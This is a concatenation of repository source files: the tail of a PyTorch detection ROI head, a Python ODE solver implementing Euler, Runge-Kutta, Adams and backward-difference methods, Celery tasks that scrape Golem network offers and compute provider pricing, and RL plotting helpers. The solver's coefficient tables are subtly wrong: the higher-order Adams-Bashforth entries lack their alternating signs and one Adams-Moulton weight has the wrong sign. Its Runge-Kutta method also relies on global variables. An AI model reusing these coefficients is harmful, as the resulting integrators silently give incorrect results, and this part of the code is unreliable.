                cls_scores_dict[num_classes] = \
                    bbox_results['cls_score'][:, -1:]
            else:
                cls_scores_dict[num_classes] += \
                    bbox_results['cls_score'][:, -1:]
        cls_scores_dict[num_classes] /= len(support_feats_dict.keys())
        # Classes without support features get zero scores/regressions.
        cls_scores = [
            cls_scores_dict[i] if i in cls_scores_dict.keys() else
            torch.zeros_like(cls_scores_dict[list(cls_scores_dict.keys())[0]])
            for i in range(num_classes + 1)
        ]
        bbox_preds = [
            bbox_preds_dict[i] if i in bbox_preds_dict.keys() else
            torch.zeros_like(bbox_preds_dict[list(bbox_preds_dict.keys())[0]])
            for i in range(num_classes)
        ]
        cls_score = torch.cat(cls_scores, dim=1)
        bbox_pred = torch.cat(bbox_preds, dim=1)
        # split batch bbox prediction back to each image
        num_proposals_per_img = tuple(len(p) for p in proposals)
        rois = rois.split(num_proposals_per_img, 0)
        cls_score = cls_score.split(num_proposals_per_img, 0)
        bbox_pred = bbox_pred.split(num_proposals_per_img, 0)
        # apply bbox post-processing to each image individually
        det_bboxes = []
        det_labels = []
        for i in range(len(proposals)):
            det_bbox, det_label = self.bbox_head.get_bboxes(
                rois[i],
                cls_score[i],
                bbox_pred[i],
                img_shapes[i],
                scale_factors[i],
                rescale=rescale,
                cfg=rcnn_test_cfg)
            det_bboxes.append(det_bbox)
            det_labels.append(det_label)
        return det_bboxes, det_labels
| csuhan/VFA | vfa/vfa_roi_head.py | vfa_roi_head.py | py | 12,474 | python | en | code | 56 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
30039556459 | import math
import numpy as np
from sympy import*
import matplotlib.pyplot as plt
class Solver:
def __init__(self, f, t0, y0, h, nsteps, inital_points):
self.f = f
self.t0 = t0
self.y0 = y0
self.h = h
self.nsteps = nsteps
self.inital_points = inital_points;
self.coef_ab = [
[1],
[1],
[3.0/2.0, 1.0/2.0],
[23.0/12.0, -4.0/3.0, 5.0/12.0],
[55.0/24.0, -59.0/24.0, 37.0/24.0, -3.0/8.0],
[1901.0/720.0, -1387.0/360.0, 109.0/30.0, -637.0/360.0, 251.0/720.0],
[4277.0/1440.0, -2641.0/480.0, 4991.0/720.0, -3649.0/720.0, 959.0/480.0, -95.0/288.0],
[198721.0/60480.0, 18367.0/2520.0, 235183.0/20160.0, 10754.0/945.0, 135713.0/20160.0, 5603.0/2520.0, 19087.0/60480.0],
[16083.0/4480.0, 1152169.0/120960.0, 242653.0/13440.0, 296053.0/13440.0, 2102243.0/120960.0, 115747.0/13440.0, 32863.0/13440.0, 5257.0/17280.0]
]
self.coef_am = [
[1],
[1.0/2.0, 1.0/2.0],
[5.0/12.0, 2.0/3.0, -1.0/12.0],
[3.0/8.0, 19.0/24.0, -5.0/24.0, 1.0/24.0],
[251.0/720.0, 323.0/360.0, -11.0/30.0, 53.0/360.0, 19.0/720.0],
[95.0/288.0, 1427.0/1440.0, -133.0/240.0, 241.0/720.0, -173.0/1440.0, 3.0/160.0],
[19087.0/60480.0, 2713.0/2520.0, -15487.0/20160.0, 586.0/945.0, -6737.0/20160.0, 263.0/2520.0, -863.0/60480.0],
[5257.0/17280.0, 139849.0/120960.0, -4511.0/4480.0, 123133.0/120960.0, -88547.0/120960.0, 1537.0/4480.0, -11351.0/120960.0, 275.0/24192.0]
]
self.coef_inv = [
[1],
[1, 1],
[2.0/3.0, 4.0/3.0, -1.0/3.0],
[6.0/11.0, 18.0/11.0, -9.0/11.0, 2.0/11.0],
[12.0/25.0, 48.0/25.0, -36.0/25.0, 16.0/25.0, -3.0/25.0],
[60.0/137.0, 300.0/137.0, -300.0/137.0, 200.0/137.0, -75.0/137.0, 12.0/137.0],
[60.0/147.0, 360.0/147.0, -450.0/147.0, 400.0/147.0, -225.0/147.0, 72.0/147.0, -10.0/147.0]
]
def get_ab(self, ans, idx, order):
value = ans[idx-1][1]
for i in range(1, order+1):
value += (self.h)*(self.coef_ab[order][i-1])*self.f(ans[idx-i][0], ans[idx-i][1])
return value
def euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
y = y + self.h*self.f(t, y)
t = t + self.h
ans.append([t, y])
return ans
def inverse_euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
k = y + self.h*self.f(t, y)
y = y + self.h*self.f(t + self.h, k)
t = t + self.h
ans.append([t, y])
return ans
def improved_euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
k = y + self.h*self.f(t, y)
y = y + 0.5*self.h*(self.f(t + self.h, k) + self.f(t, y))
t = t + self.h
ans.append([t, y])
return ans
def runge_kutta(self):
ans = []
t, y = self.t0, self.y0
ans.append([t, y])
for i in range(1, self.nsteps+1):
k1 = f(t, y)
k2 = f(t + 0.5*h, y + 0.5*h*k1)
k3 = f(t + 0.5*h, y + 0.5*h*k2)
k4 = f(t + h, y + h*k3)
y = y + h*(k1 + 2*k2 + 2*k3 + k4)/6
t = t + h
ans.append([t, y])
return ans
def adam_bashforth_by_method(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_ab(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
def get_am(self, ans, idx, order):
    """Adams-Moulton predictor-corrector step.

    Predicts ans[idx] in place with Adams-Bashforth, then corrects using
    the implicit Adams-Moulton weights self.coef_am[order] over the points
    idx, idx-1, ..., idx-order.
    """
    ans[idx][1] = self.get_ab(ans, idx, order)
    ans[idx][0] = ans[idx - 1][0] + self.h
    weights = self.coef_am[order]
    corrected = ans[idx - 1][1]
    for j in range(order + 1):
        t_j, y_j = ans[idx - j]
        corrected += self.h * weights[j] * self.f(t_j, y_j)
    return corrected
def adam_multon_by_method(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_am(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
def get_inv(self, ans, idx, order):
    """Backward differentiation formula (BDF) step.

    Predicts ans[idx] in place with Adams-Bashforth, then combines
    h*f at the new point (weight coef_inv[order][0]) with the `order`
    preceding y values.
    """
    ans[idx][1] = self.get_ab(ans, idx, order)
    ans[idx][0] = ans[idx - 1][0] + self.h
    weights = self.coef_inv[order]
    total = weights[0] * self.h * self.f(ans[idx][0], ans[idx][1])
    for j in range(1, order + 1):
        total += weights[j] * ans[idx - j][1]
    return total
def backward_diff(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_inv(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
# Main part of the code
# We wish to find an approximate solution to the equation dy/dt = f(t, y).
# Each line of in.txt describes one run. Methods that bootstrap from a list
# of initial points ('adam_bashforth', 'adam_multon', 'formula_inversa')
# carry those points right after the method name and (h, nsteps, expr, order)
# at the end of the line; every other method uses the fixed layout:
#   method y0 t0 h nsteps expr [order]
#
# Fixes: the input file handle was previously bound to `f` and then
# clobbered by the lambdified function (and never closed); the 20-branch
# if/elif dispatch is now a table; the output loop uses enumerate.
with open("in.txt") as input_file:
    for line in input_file:
        entrada = line.split()
        method = entrada[0]
        ini_pts = []
        if method in ('adam_bashforth', 'adam_multon', 'formula_inversa'):
            # These variants receive `order` initial points on the line.
            order = int(entrada[-1])
            expr = sympify(entrada[-2])
            t, y = symbols("t y")
            # NOTE: `f` and `h` intentionally stay module-level globals with
            # these names -- Solver.runge_kutta reads them from module scope.
            f = lambdify((t, y), expr, "numpy")
            nsteps = int(entrada[-3])
            h = float(entrada[-4])
            t0, y0 = float(entrada[-5]), 0
            for i in range(1, 1 + order):
                ini_pts.append([t0 + (i - 1) * h, float(entrada[i])])
        else:
            y0, t0 = float(entrada[1]), float(entrada[2])
            h = float(entrada[3])
            nsteps = int(entrada[4])
            expr = sympify(entrada[5])
            t, y = symbols("t y")
            f = lambdify((t, y), expr, "numpy")
        solver = Solver(f, t0, y0, h, nsteps, ini_pts)

        # One-step methods: label and zero-argument solver entry point.
        one_step = {
            'euler': ("Metodo de Euler", solver.euler),
            'euler_inverso': ("Metodo de Euler Inverso", solver.inverse_euler),
            'euler_aprimorado': ("Metodo de Euler Aprimorado", solver.improved_euler),
            'runge_kutta': ("Metodo de Runge-Kutta", solver.runge_kutta),
        }
        # Multi-step methods: (label, entry point, bootstrap, order offset).
        # Adam-Moulton and the backward-differentiation formula use order-1.
        multi_step = {
            'adam_bashforth': ("Metodo de Adam-Bashforth", solver.adam_bashforth_by_method, 'list', 0),
            'adam_bashforth_by_euler': ("Metodo de Adam-Bashforth por Euler", solver.adam_bashforth_by_method, 'euler', 0),
            'adam_bashforth_by_euler_inverso': ("Metodo de Adam-Bashforth por Euler Inverso", solver.adam_bashforth_by_method, 'inverse euler', 0),
            'adam_bashforth_by_euler_aprimorado': ("Metodo de Adam-Bashforth por Euler Aprimorado", solver.adam_bashforth_by_method, 'improved euler', 0),
            'adam_bashforth_by_runge_kutta': ("Metodo de Adam-Bashforth por Runge Kutta", solver.adam_bashforth_by_method, 'runge kutta', 0),
            'adam_multon': ("Metodo de Adam-Multon", solver.adam_multon_by_method, 'list', -1),
            'adam_multon_by_euler': ("Metodo de Adam-Multon por Euler", solver.adam_multon_by_method, 'euler', -1),
            'adam_multon_by_euler_inverso': ("Metodo de Adam-Multon por Euler Inverso", solver.adam_multon_by_method, 'inverse euler', -1),
            'adam_multon_by_euler_aprimorado': ("Metodo de Adam-Multon por Euler Aprimorado", solver.adam_multon_by_method, 'improved euler', -1),
            'adam_multon_by_runge_kutta': ("Metodo de Adam-Multon por Runge Kutta", solver.adam_multon_by_method, 'runge kutta', -1),
            'formula_inversa': ("Metodo Formula Inversa de Diferenciacao", solver.backward_diff, 'list', -1),
            'formula_inversa_by_euler': ("Metodo Formula Inversa de Diferenciacao por Euler", solver.backward_diff, 'euler', -1),
            'formula_inversa_by_euler_inverso': ("Metodo Formula Inversa de Diferenciacao por Euler Inverso", solver.backward_diff, 'inverse euler', -1),
            'formula_inversa_by_euler_aprimorado': ("Metodo Formula Inversa de Diferenciacao por Euler Aprimorado", solver.backward_diff, 'improved euler', -1),
            'formula_inversa_by_runge_kutta': ("Metodo Formula Inversa de Diferenciacao por Runge Kutta", solver.backward_diff, 'runge kutta', -1),
        }

        pts = []
        if method in one_step:
            label, run = one_step[method]
            print(label)
            pts = run()
        elif method in multi_step:
            label, run, bootstrap, offset = multi_step[method]
            if bootstrap != 'list':
                # *_by_* variants carry the order at a fixed position.
                order = int(entrada[6])
            print(label)
            pts = run(order + offset, bootstrap)

        print("y(%.2f) = %.2f" % (pts[0][0], pts[0][1]))
        print("h = %.2f" % h)
        for i, (x_val, y_val) in enumerate(pts):
            print("%d %.10lf" % (i, y_val))
        ######################### ploting the solution #############################
        ####### comment the folowing lines to not plot solution ######
        toplot = np.array(pts)
        plt.plot(toplot[:, 0], toplot[:, 1], ls='-', color='black', linewidth=1)
        plt.show()
        #################################################################################
        print("\n")
| vserraa/Numerical-Methods | solver.py | solver.py | py | 9,570 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
10017544829 | from core.celery import app
from celery import Celery
import json
import subprocess
import os
from .models import Node, Offer
from django.utils import timezone
import tempfile
import redis
from .serializers import NodeSerializer, OfferSerializer
import calendar
import datetime
import requests
from api.serializers import FlatNodeSerializer
from collector.models import Node as NodeV1
pool = redis.ConnectionPool(host='redis', port=6379, db=0)
r = redis.Redis(connection_pool=pool)
@ app.task
def v2_network_online_to_redis():
    """Serialize every online v2 Node and cache the JSON under "v2_online"."""
    online_nodes = Node.objects.filter(online=True)
    payload = NodeSerializer(online_nodes, many=True).data
    r.set("v2_online", json.dumps(payload, default=str))
@app.task
def v2_network_online_to_redis_flatmap():
    """Serialize online v1 nodes with the flat serializer and cache them
    under "v2_online_flatmap"."""
    online_nodes = NodeV1.objects.filter(online=True)
    payload = FlatNodeSerializer(online_nodes, many=True).data
    r.set("v2_online_flatmap", json.dumps(payload))
@ app.task
def v2_cheapest_offer():
    """Cache vm offers updated in the last 5 minutes under "v2_cheapest_offer".

    NOTE(review): order_by('-monthly_price_glm') sorts descending (most
    expensive first) even though the key says "cheapest" -- confirm intent.
    """
    window_start = timezone.now() - timezone.timedelta(minutes=5)
    recent_offers = Offer.objects.filter(
        runtime="vm",
        updated_at__range=(window_start, timezone.now())).order_by('-monthly_price_glm')
    payload = OfferSerializer(recent_offers, many=True).data
    r.set("v2_cheapest_offer", json.dumps(payload, default=str))
@ app.task
def latest_blog_posts():
    """Fetch the three newest Golem blog posts (Ghost API) and cache them
    for the index page under "v2_index_blog_posts"."""
    response = requests.get(
        f"https://blog.golemproject.net/ghost/api/v3/content/posts/?key={os.environ.get('BLOG_API_KEY')}&include=tags,authors&limit=3")
    r.set("v2_index_blog_posts", json.dumps(response.json()))
@ app.task
def v2_cheapest_provider():
    """Build the "Golem vs cloud" monthly price-comparison tables and cache them.

    Pulls the current GLM/USD price from CoinGecko, then for each VM-size
    bucket (2, 8, 32, 64 cores) pairs four hard-coded cloud offerings with
    the first online mainnet Golem provider that has at least that many
    threads, sorts each bucket by monthly USD price, and stores the JSON in
    redis under "v2_cheapest_provider".
    """
    # GLM token price in USD via CoinGecko's ERC-20 contract endpoint.
    req = requests.get(
        "https://api.coingecko.com/api/v3/coins/ethereum/contract/0x7DD9c5Cba05E151C895FDe1CF355C9A1D5DA6429")
    data = req.json()
    price = data['market_data']['current_price']['usd']
    obj = Offer.objects.filter(
        runtime="vm", provider__online=True).order_by("monthly_price_glm")
    serializer = OfferSerializer(obj, many=True)
    # Keep only providers that accept mainnet GLM payments.
    mainnet_providers = []
    for index, provider in enumerate(serializer.data):
        if "golem.com.payment.platform.erc20-mainnet-glm.address" in provider['properties']:
            mainnet_providers.append(provider)
    # Sort by thread count first, then by monthly GLM price, so the first
    # provider matching a bucket below is the cheapest adequate one.
    sorted_pricing_and_specs = sorted(mainnet_providers, key=lambda element: (
        float(element['properties']['golem.inf.cpu.threads']), float(element['monthly_price_glm'])))
    # Hard-coded cloud reference offers per size bucket; "glm" is the USD
    # price converted at the current GLM exchange rate.
    two_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
                  'usd_monthly': '15', 'bandwidth': '3', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
                  'usd_monthly': '15.23', 'bandwidth': 'Unlimited', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15.23}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
                  'usd_monthly': '10.37', 'bandwidth': 'Unlimited', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 10.37}, {'name': 'Azure', 'img': '/azure-logo.svg',
                  'usd_monthly': '15.11', 'bandwidth': '6', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15.11}, ]
    eight_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
                    'usd_monthly': '80', 'bandwidth': '6', 'cores': 8, 'memory': '16', 'disk': "320", "glm": float(price) * 80}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
                    'usd_monthly': '121.81', 'bandwidth': 'Unlimited', 'cores': 8, 'memory': '16', 'disk': "320", "glm": float(price) * 121.81}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
                    'usd_monthly': '208.47', 'bandwidth': 'Unlimited', 'cores': 8, 'memory': '32', 'disk': "320", "glm": float(price) * 208.47}, {'name': 'Azure', 'img': '/azure-logo.svg',
                    'usd_monthly': '121.18', 'cores': 8, 'memory': '16', 'bandwidth': '6', 'disk': "320", "glm": float(price) * 121.18}]
    thirtytwo_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
                        'usd_monthly': '640', 'bandwidth': '9', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 640}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
                        'usd_monthly': '834.24', 'bandwidth': 'Unlimited', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 834.24}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
                        'usd_monthly': '746.04', 'bandwidth': 'Unlimited', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 746.04}, {'name': 'Azure', 'img': '/azure-logo.svg',
                        'usd_monthly': '1310.13', 'bandwidth': '1', 'cores': 32, 'memory': '64', 'disk': "256", "glm": float(price) * 1310.13}, ]
    sixtyfour_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
                        'usd_monthly': '1200', 'bandwidth': '9', 'cores': 40, 'memory': '160', 'disk': "500", "glm": float(price) * 1200}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
                        'usd_monthly': '1638.48', 'bandwidth': 'Unlimited', 'cores': 64, 'memory': '64', 'disk': "500", "glm": float(price) * 1638.48}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
                        'usd_monthly': '1914.62', 'bandwidth': 'Unlimited', 'cores': 60, 'memory': '240', 'disk': "500", "glm": float(price) * 1914.62}, {'name': 'Azure', 'img': '/azure-logo.svg',
                        'usd_monthly': '2688.37', 'bandwidth': '1', 'cores': 64, 'memory': '256', 'disk': "512", "glm": float(price) * 2688.37}, ]
    # Append exactly one Golem provider per bucket: the len(...) == 4 guard
    # only admits the first candidate. The `==` / `elif >=` split is
    # redundant -- `>=` alone would select the same (first adequate) provider.
    for obj in sorted_pricing_and_specs:
        provider = {}
        provider['name'] = "Golem Network"
        provider['node_id'] = obj['properties']['id']
        provider['img'] = "/golem.png"
        provider['usd_monthly'] = float(
            price) * float(obj['monthly_price_glm'])
        provider['cores'] = float(
            obj['properties']['golem.inf.cpu.threads'])
        provider['memory'] = float(obj['properties']['golem.inf.mem.gib'])
        provider['bandwidth'] = "Unlimited"
        provider['disk'] = float(
            obj['properties']['golem.inf.storage.gib'])
        provider['glm'] = float(obj['monthly_price_glm'])
        if float(obj['properties']['golem.inf.cpu.threads']) == 2 and len(two_cores) == 4:
            two_cores.append(provider)
        elif float(obj['properties']['golem.inf.cpu.threads']) >= 2 and len(two_cores) == 4:
            two_cores.append(provider)
        if float(obj['properties']['golem.inf.cpu.threads']) == 8 and len(eight_cores) == 4:
            eight_cores.append(provider)
        elif float(obj['properties']['golem.inf.cpu.threads']) >= 8 and len(eight_cores) == 4:
            eight_cores.append(provider)
        if float(obj['properties']['golem.inf.cpu.threads']) == 32 and len(thirtytwo_cores) == 4:
            thirtytwo_cores.append(provider)
        elif float(obj['properties']['golem.inf.cpu.threads']) >= 32 and len(thirtytwo_cores) == 4:
            thirtytwo_cores.append(provider)
        if float(obj['properties']['golem.inf.cpu.threads']) == 64 and len(sixtyfour_cores) == 4:
            sixtyfour_cores.append(provider)
        elif float(obj['properties']['golem.inf.cpu.threads']) >= 64 and len(sixtyfour_cores) == 4:
            sixtyfour_cores.append(provider)
    # Final ordering within each bucket is cheapest-first by USD.
    sorted_two = sorted(two_cores, key=lambda element: (
        float(element['usd_monthly'])))
    sorted_eight = sorted(eight_cores, key=lambda element: (
        float(element['usd_monthly'])))
    sorted_thirtytwo = sorted(thirtytwo_cores, key=lambda element: (
        float(element['usd_monthly'])))
    sorted_sixtyfour = sorted(sixtyfour_cores, key=lambda element: (
        float(element['usd_monthly'])))
    data = json.dumps({'2': sorted_two, '8': sorted_eight,
                       '32': sorted_thirtytwo, '64': sorted_sixtyfour})
    r.set("v2_cheapest_provider", data)
@ app.task
def v2_offer_scraper():
    """Scrape mainnet provider offers and sync Node/Offer rows in the DB.

    Runs each command from data.config (they populate the redis key
    "offers_v2"), then creates/updates a Node and an Offer per scraped
    entry; vm offers get a monthly GLM price computed from the linear
    pricing coefficients. Nodes absent from the scrape are marked offline.
    """
    os.chdir("/stats-backend/yapapi/examples/low-level-api/v2")
    # Each line of data.config is a shell command that performs the scrape.
    with open('data.config') as f:
        for line in f:
            command = line
            proc = subprocess.Popen(command, shell=True)
            proc.wait()
    content = r.get("offers_v2")
    serialized = json.loads(content)
    # Seconds in the current calendar month, used to project pricing.
    now = datetime.datetime.now()
    days_in_current_month = calendar.monthrange(
        now.year, now.month)[1]
    seconds_current_month = days_in_current_month*24*60*60
    for line in serialized:
        data = json.loads(line)
        provider = data['id']
        wallet = data['wallet']
        obj, created = Node.objects.get_or_create(node_id=provider)
        if created:
            offerobj = Offer.objects.create(properties=data, provider=obj,
                                            runtime=data['golem.runtime.name'])
            if data['golem.runtime.name'] == 'vm':
                # Map usage-vector labels to their coefficient indices.
                vectors = {}
                for key, value in enumerate(data['golem.com.usage.vector']):
                    vectors[value] = key
                # monthly price = duration coeff * month-seconds
                #               + cpu coeff * month-seconds * cores
                #               + fixed fee (assumed to be the last coeff --
                #                 TODO confirm against the yagna pricing model)
                monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
                    data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
                offerobj.monthly_price_glm = monthly_pricing
                offerobj.save()
            obj.wallet = wallet
            obj.online = True
            obj.save()
        else:
            offerobj, offercreated = Offer.objects.get_or_create(
                provider=obj, runtime=data['golem.runtime.name'])
            if data['golem.runtime.name'] == 'vm':
                vectors = {}
                for key, value in enumerate(data['golem.com.usage.vector']):
                    vectors[value] = key
                # Same pricing projection as in the `created` branch above.
                monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
                    data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
                offerobj.monthly_price_glm = monthly_pricing
                offerobj.save()
            offerobj.properties = data
            offerobj.save()
            obj.runtime = data['golem.runtime.name']
            obj.wallet = wallet
            obj.online = True
            obj.save()
    # Find offline providers: any previously-online node whose id does not
    # appear anywhere in the concatenated scrape output is marked offline.
    str1 = ''.join(serialized)
    fd, path = tempfile.mkstemp()
    try:
        # NOTE(review): the temp file is written but never read back --
        # looks like leftover debugging; confirm before removing.
        with os.fdopen(fd, 'w') as tmp:
            # do stuff with temp file
            tmp.write(str1)
        online_nodes = Node.objects.filter(online=True)
        for node in online_nodes:
            if not node.node_id in str1:
                node.online = False
                node.computing_now = False
                node.save(update_fields=[
                    'online', 'computing_now'])
    finally:
        os.remove(path)
@ app.task
def v2_offer_scraper_hybrid_testnet():
    """Scrape testnet offers via a yagna helper script and bulk-sync the DB.

    Reads the scraped offers JSON from redis ("v2_offers_hybrid_testnet"),
    bulk-creates/updates Node and Offer rows (computing a monthly GLM price
    for vm offers from the linear pricing coefficients), and marks nodes
    missing from the scrape as offline.
    """
    os.chdir("/stats-backend/yapapi/examples/low-level-api/hybrid")
    proc = subprocess.Popen(
        'export YAGNA_APPKEY=$(yagna app-key list --json | jq -r .[0].key) && python3 list-offers-testnet.py', shell=True)
    proc.wait()
    content = r.get("v2_offers_hybrid_testnet")
    serialized = json.loads(content)
    # Seconds in the current calendar month, used to project pricing.
    now = datetime.datetime.now()
    days_in_current_month = calendar.monthrange(
        now.year, now.month)[1]
    seconds_current_month = days_in_current_month*24*60*60
    nodes_to_create = []
    nodes_to_update = []
    offers_to_create = []
    offer_to_update = []
    # Start from all currently-online node ids; anything still in this set
    # after the loop was absent from the scrape and gets marked offline.
    offline_nodes = set(Node.objects.filter(
        online=True).values_list('node_id', flat=True))
    for line in serialized:
        data = json.loads(line)
        provider = data['id']
        wallet = data['wallet']
        obj, created = Node.objects.get_or_create(node_id=provider)
        if created:
            if data['golem.runtime.name'] == 'vm':
                # Map usage-vector labels to their coefficient indices.
                vectors = {}
                for key, value in enumerate(data['golem.com.usage.vector']):
                    vectors[value] = key
                # monthly price = duration coeff * month-seconds
                #               + cpu coeff * month-seconds * cores
                #               + fixed fee (last coeff -- TODO confirm)
                monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
                    data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
                offers_to_create.append(
                    Offer(properties=data, provider=obj, runtime=data['golem.runtime.name'], monthly_price_glm=monthly_pricing))
            # NOTE(review): this append runs unconditionally, so a new vm
            # node queues TWO Offer rows (one priced, one without a price);
            # looks like a missing `else` -- confirm.
            offers_to_create.append(
                Offer(properties=data, provider=obj, runtime=data['golem.runtime.name']))
            # NOTE(review): get_or_create above already persisted this node;
            # bulk-creating another Node with the same node_id below looks
            # unintended -- confirm.
            nodeobj = Node(node_id=provider, wallet=wallet, online=True)
            nodes_to_create.append(
                nodeobj)
        else:
            offerobj, offercreated = Offer.objects.get_or_create(
                provider=obj, runtime=data['golem.runtime.name'])
            if data['golem.runtime.name'] == 'vm':
                vectors = {}
                for key, value in enumerate(data['golem.com.usage.vector']):
                    vectors[value] = key
                # Same pricing projection as in the `created` branch above.
                monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
                    data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
                offerobj.monthly_price_glm = monthly_pricing
            offerobj.properties = data
            offerobj.runtime = data['golem.runtime.name']
            if offercreated:
                offers_to_create.append(offerobj)
            else:
                offer_to_update.append(offerobj)
            obj.wallet = wallet
            obj.online = True
            obj.updated_at = timezone.now()
            nodes_to_update.append(obj)
        # Node was seen in this scrape -> it is not offline.
        if provider in offline_nodes:
            offline_nodes.remove(provider)
    Node.objects.bulk_create(nodes_to_create)
    Node.objects.bulk_update(nodes_to_update, fields=[
        'wallet', 'online', 'updated_at', ])
    Offer.objects.bulk_create(offers_to_create)
    Offer.objects.bulk_update(offer_to_update, fields=[
        'properties', 'monthly_price_glm'])
    # mark offline nodes as offline
    Node.objects.filter(node_id__in=offline_nodes, online=True).update(
        online=False, computing_now=False, updated_at=timezone.now())
| golemfactory/golem-stats-backend | stats-backend/api2/tasks.py | tasks.py | py | 17,630 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "redis.ConnectionPool",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "redis.Redis",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "models.Node.objects.filter",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "models.No... |
18045830902 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
def get_reward_curve(agents):
    """Collect each agent's total reward into a numpy array.

    :param agents: list of agents used in training (one per episode)
    :return: np.ndarray of the agents' ``reward_total`` values
    """
    totals = [agent.reward_total for agent in agents]
    return np.array(totals)
def choose_best(agents):
    """Return the agent from the episode with the highest total reward.

    Ties resolve to the earliest such episode (matches np.argmax).

    :param agents: list of agents used in training
    :return: the agent with the highest ``reward_total``
    """
    rewards = np.array([agent.reward_total for agent in agents])
    return agents[int(np.argmax(rewards))]
def moving_average(v, n):
    """Simple moving average with window size n.

    :param v: vector of values
    :param n: number of samples across which to calculate the average
    :return: (averages, episode indices n..len(v)) as numpy arrays
    """
    kernel = np.ones(n) / n
    averages = np.convolve(v, kernel, 'valid')
    episodes = np.array(range(n, len(v) + 1))
    return averages, episodes
def plot_average_reward_curve(agents, n=50):
    """Plot the n-episode moving average of the training reward curve.

    :param agents: list of agents corresponding to episodes
    :param n: number of samples across which to calculate the average
    :return:
    """
    rewards = get_reward_curve(agents)
    mov_ave, episodes = moving_average(rewards, n=n)
    plt.figure()
    plt.plot(episodes, mov_ave)
    plt.xlabel('Episode')
    plt.ylabel('Average Reward for Last {:d} Episodes'.format(n))
    plt.show()
def run_network(initial_state, env, model):
    """Roll out the trained policy deterministically, then plot the
    agent's state history.

    :param initial_state: initial state of the agent
    :param env: RL environment used for training
    :param model: RL model generated by training
    :return:
    """
    obs = env.reset(initial_state=initial_state)
    done = False
    while not done:
        action, _ = model.predict(obs, deterministic=True)
        obs, _, done, _ = env.step(action)
    env.agent.plot_state_history(style='segmented')
def run_network_for_shap(env, model, num_trials=100):
    """Generate deterministic trajectories for SHAP analysis.

    :param env: RL environment used for training
    :param model: RL model generated by training
